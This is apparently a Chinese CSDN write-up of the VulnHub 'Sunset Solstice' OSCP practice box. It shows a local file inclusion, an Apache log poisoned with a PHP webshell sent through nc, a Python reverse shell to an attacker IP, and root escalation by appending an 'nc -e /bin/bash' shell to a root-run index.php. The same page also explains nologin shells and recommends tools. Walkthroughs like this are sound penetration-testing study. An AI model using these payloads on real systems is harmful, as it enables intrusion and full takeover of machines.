OSCP官方靶场-Solstice WP

官方网页打开或靶场下载链接

https://www.vulnhub.com/entry/sunset-solstice,499/

信息收集

靶机地址:

bash 复制代码
192.168.149.72

扫描开放的端口,使用VPN扫描又挂代理的话,又一定记录扫漏了。考试时候建议用官方的My kali先扫一遍,是最快最全的。

bash 复制代码
ports=$(sudo nmap -p- --min-rate=10000 -Pn 192.168.149.72 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
sudo nmap --script=vuln -p$ports -Pn 192.168.149.72
sudo nmap -sU --min-rate 10000 -p- -Pn 192.168.149.72

再次细致的扫描端口上的组件和版本信息,这里VPN断了,所以没有扫除具体信息。从之前用官方的My Kali扫描的信息能获得一些端口的信息。

bash 复制代码
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.149.72

从之前的扫描信息中看,除了80端口,还有8593端口也开放,一个一个点开了看看有什么。

文件包含

从8593端口的链接方式猜测似乎有文件包含漏洞

html 复制代码
../../../../../../../../../var/log/apache2/access.log

log文件投毒

可以看到log文件中记录了请求头,我们下一步在请求头中写入一句话木马,就可以把log污染成马。

到这里链接断了,换了重启靶机后IP更换为 192.168.196.72,用Win本机的Burp抓不上包改用命令行注入

bash 复制代码
echo -e "GET / HTTP/1.1\r\nHost: 192.168.51.72\r\nUser-Agent: <?php system(\$_GET['cmd']); ?>\r\nConnection: close\r\n\r\n" | nc 192.168.51.72 80
或者
nc 192.168.43.127 80
回车输入GET /<?php system($_GET['cmd']); ?> HTTP/1.1

或者也可以用浏览器工具,但是这个似乎不成功。

反弹Shell

然后把命令换成反弹shell的命令,这个本机的地址

bash 复制代码
python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.180%22%2C4777%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27

提权

输入以下命令查找有root权限的文件和进程

bash 复制代码
ps -aux | grep root

可以发现在/var/tmp/sv/目录下似乎有一些奇特的东西

这是一个php文件,是网页主页的文件,从命令来看,他开在57端口。下一步的思路就是,把这个php改成能提权弹shell的木马。然后访问57端口就能激活这个一句话木马。

bash 复制代码
echo "<?php system('nc 192.168.45.180 4445 -e /bin/bash')?>" >> index.php

57这个端口没有对外开放,所以我们只能在shell上弹一下。

bash 复制代码
.\nc.exe -lvnp 4445
curl 127.0.0.1:57/index.php

补充知识点

/usr/sbin/nologin和**/bin/bash**的区别

特性 /usr/sbin/nologin /bin/bash
基本用途 禁止交互式登录 允许交互式命令行操作
用户类型 系统服务账户(如 mysql, www-data) 普通用户或管理员账户
登录行为 ▶ 拒绝登录 ▶ 显示预设提示信息(默认或自定义) ▶ 允许登录 ▶ 启动 Bash 交互环境
Shell 功能 无执行能力(仅返回错误信息) 完整命令行解释器(支持脚本/命令)
自定义提示 支持(通过 /etc/nologin.txt 文件) 通过 ~/.bashrc 自定义
典型应用场景 守护进程账户 FTP虚拟用户 安全锁账户 普通用户登录 管理员维护 开发环境
检查命令 grep nologin /etc/passwd grep bash /etc/passwd
详细说明
  1. /usr/sbin/nologin

    • 安全隔离机制:阻止账户获得任何交互式 Shell

    • 工作流程:

      1. 用户尝试登录(SSH/FTP/控制台)
      2. 系统显示拒绝信息(默认:"This account is currently not available.")
      3. 立即终止会话
    • 自定义提示:

      复制代码
      echo "管理员专用账户,禁止登录" > /etc/nologin.txt
    • 典型配置示例

      (/etc/passwd):

      复制代码
      ftpuser:x:1001:1001::/var/ftp:/usr/sbin/nologin
  2. /bin/bash

    • 全功能交互环境:

      • 支持命令执行、脚本运行、作业控制
      • 配置文件:~/.bashrc, ~/.profile
    • 开发/运维能力:

      复制代码
      # 允许运行所有命令
      $ vim /etc/config
      $ systemctl restart service
⚠️ 重要安全建议
  • 系统服务账户 必须使用 nologin(如 MySQL/Nginx 账户)
  • 普通用户 仅在必要时应获得 bash 权限
  • 临时锁定账户usermod -s /usr/sbin/nologin username
  • 解锁账户usermod -s /bin/bash username

推荐小工具rlwarp

可以让反弹shell用上下键快捷切换历史命令,而不是输入一堆[A[A[A[A

bash 复制代码
sudo apt-get install rlwrap
# 原版nc
nc -nlvp 4444
# 能上下翻历史命令的nc
rlwarp -cAr nc -nlvp 4444

推荐小工具peass小豌豆

https://github.com/peass-ng/PEASS-ng

能够扫描分析初步获得权限的设备上可以的文件。

相关推荐
workflower9 分钟前
MDSE和敏捷开发相互矛盾之处:方法论本质的冲突
数据库·软件工程·敏捷流程·极限编程
FreeBuf_9 分钟前
微软365 PDF导出功能存在本地文件包含漏洞,可泄露敏感服务器数据
服务器·microsoft·pdf
Tony小周19 分钟前
实现一个点击输入框可以弹出的数字软键盘控件 qt 5.12
开发语言·数据库·qt
lifallen38 分钟前
Paimon 原子提交实现
java·大数据·数据结构·数据库·后端·算法
lixzest39 分钟前
C++ Lambda 表达式详解
服务器·开发语言·c++·算法
o不ok!44 分钟前
Linux面试问题-软件测试
linux·运维·服务器
TDengine (老段)1 小时前
TDengine 数据库建模最佳实践
大数据·数据库·物联网·时序数据库·tdengine·涛思数据
Elastic 中国社区官方博客1 小时前
Elasticsearch 字符串包含子字符串:高级查询技巧
大数据·数据库·elasticsearch·搜索引擎·全文检索·lucene
Gauss松鼠会2 小时前
GaussDB应用场景全景解析:从金融核心到物联网的分布式数据库实践
数据库·分布式·物联网·金融·database·gaussdb
守城小轩2 小时前
Chromium 136 编译指南 - Android 篇:开发工具安装(三)
android·数据库·redis